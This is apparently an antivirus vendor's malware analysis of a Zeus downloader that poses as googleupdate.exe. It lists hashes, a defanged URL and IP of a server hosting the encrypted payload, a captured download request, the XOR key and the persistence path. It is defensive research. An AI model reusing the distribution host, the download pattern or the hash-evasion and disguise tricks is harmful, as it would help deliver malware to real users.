After last month’s paper describing how Zeus with additional Necurs rootkit functionality onboard can infect 64-bit Windows by installing system notifiers we saw an increase in samples coming into the lab this month, totalling 568 samples.
In this paper we will analyze the installation stage, for which the Zeus downloader is responsible.

1. The GoogleUpdate

In a Lavasoft MAS
Zbot report we see that it copies and renames itself as “googleupdate.exe” (
MD5: 795ae0d1bb3d3494c8b9be94b04ba2b5 detected by Ad-Aware as Trojan.GenericKD.1568342. Malware writers are known to disguise files to make them look like Google applications – it’s a simple trick that helps the malware stay under the radar.
Last year we analysed an attack using the Microsoft 0-day exploit CVE-2013-3906 which used the original GoogleUpdate.exe (116 648 bytes, MD5: 506708142bc63daba64f2d3ad1dcd5bf) signed by Google to run a malicious dll named as the legitimate one “Goopdate.dll” (MD5: e4cb1ea2667f1b3b712f4402f0737627) as shown below on the picture.

This time we found the fake “googleupdate.exe” among the dropped files:

The first file “googleupdate.exe” is a copy of Zeus downloader (16 896 bytes in size, MD5: c70b46ebbe517c26e3e7c4de716e8e3f) with the added execution path of the original backdoor file:

This minor change to the file means the Zeus copy has a different size and hash value to the original.

2. The Downloadee

Another file, randomly named “yqvyi.exe” (372 224 bytes), was downloaded from a server in United States:

URL	IP
hxxp://londonroofingroofers.co.uk/wp-content/uploads/2013/12/13UKp.z12	66.221.228.55

We see the two URLs hardcoded inside the downloader body (the first URL was offline):

The file with ZZP signature at the beginning was delivered in packed form (LZNT1 compressor was used) and encrypted (32-bit XOR key, in this case “0x8B537673”) as previously described (Zeus Backdoor Adopts Extra Rootkit Abilities):

GET /wp-content/uploads/2013/12/13UKp.z12 HTTP/1.1

Accept: text/*, application/*

User-Agent: Updates downloader

Host: londonroofingroofers.co.uk

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Mon, 28 Apr 2014 00:52:56 GMT

Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4

Last-Modified: Thu, 13 Feb 2014 03:46:35 GMT

ETag: "5a4ecd-4bf98-4f2418935c1ea"

Accept-Ranges: bytes

Content-Length: 311192

Content-Type: text/plain; charset=UTF-8
ZZP.Q...,..Pvs..rs...s..vK.Rv3.kls.Sv}.L.}.....S.r..W'.:v..#...!.s.s..
.=...s...!...S....9 .>v..6X~.YRr...........v..../.vt..../.vt..../.t
|u..q...q.N../.t@...F.t../.7s..../.ttu....T...QQ'...q.....R.r..&6.S:r.
sv.`d8...vs.R}r.Sv......Z7f.Qf..Es...sq..ss.L.q..tm.\vh.BpL.\ui.H.p.Pt
s3j~v.7ww[Vv..WW0.Vv3.tX.C6...P,..xwW..Lr.[vS.S.].!...2vs!8t.Ke4...}y.
U6....s..w&KZ.~KRD......!...0.qIi.O.....l...SIs.SIs.S#......cN6....D.v
.*..{..S....o.S $.6.@tjvN?.3s..!..9w(.;^s.Q.2..!...vs.S...[.n.2r...! .
w.s.2uk.Py..3s.LV.p.mO..-vct&b..C.s..rs...6.G.....q.N6..O....u..&z..[u
zb.7...w|...{.C.{*..u..Vw...v..R.SSm...~3..V...cokU.... ...y..R.u.....
H.sKPR.c..w.S.h...6W.v>w..`.R.WH.wm..Tq..v...........U..R.y.M;|.N4p
(G7R......M..a.6.Sr..j.o.....\M..,h0.@;u.w...WE..S.......^w...((B..6).
...W@..I.e....k1`a.EE.P.`.......zao.z...g$.&Vw...u.B  .;V...l.iDM..\..
<<< skipped >>>

After decrypting and unpacking the downloaded file (13UKp.z12) we can see the following PE file (372 224 bytes which coincides with the above mentioned “yqvyi.exe”):

You can download the decryption tool for Zeus archives MD5: 7e75febf814643c4f66b590886458fea.
The unpacked backdoor similar to “googleupdate.exe” contains encrypted extra data after the resources section:

The picture above shows that the downloader modifies the data at the end of the downloaded file when saving it to disk, which results in different MD5 hashes of the installed trojan.
The whole process of Zeus installation is shown in Process Monitor:

The initial downloader process starts itself as ‘googleupdate.exe’. Googleupdate.exe then downloads and runs the randomly named lkajsd.exe which finally copies itself as fefo.exe (a.k.a. “yqvyi.exe” – again, the name is random) into «c:\Documents and Settings\"%CurrentUserName%"\Application Data\\» from where it will be started every time Windows boots up. By dong so, Zeus obfuscates its installation and complicates analysis.

3. Static Analysis

The Import Address Table of the downloader does not contain any functions that point to downloading abilities. However, after decryption it loads necessary the Internet functions from urlmon.dll.

“Innocent” Zeus downloader IAT

It should be noted that both downloader and downloadee uses Windows messaging to communicate with each other.

The installed backdoor creates a window with a class name “Huntsville” and a window name “liquorice”.

We will continue monitoring new versions of Zeus collected by the Lab for new features.

Read also:
Lavasoft Security Bulletin - April 2014: Bot Review.

Lavasoft Security Bulletin - April 2014: Top Threats.